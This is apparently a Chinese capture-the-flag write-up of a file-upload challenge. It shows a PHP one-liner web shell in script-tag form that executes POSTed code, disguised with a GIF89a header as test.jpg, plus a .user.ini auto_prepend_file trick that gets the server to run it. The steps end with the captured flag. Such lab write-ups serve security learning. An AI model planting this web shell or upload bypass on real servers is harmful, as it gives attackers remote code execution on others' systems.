1、点击题目连接来到页面
2、上传正常的jpg文件,提示内容不能有<?。本来打算上传图片马,但是有过滤
3、可以改成下面的图片马:
<script language='php'>@eval($_POST['cmd']);</script>
4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传
5、必须要是图片类型,将一句话木马,添加图片头后再上传
6、上传成功了,但是需要让图片马当成php代码来执行
.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)
GIF89a
auto_prepend_file=test.jpg
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显
8、访问下面url,页面回显
9、测试,发现文件上传成功
10、使用系统函数,查看文件根目录,发现flag文件
11、输出flag
flag{cdf7e33f-1c42-4715-b628-8780eddfe13d}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
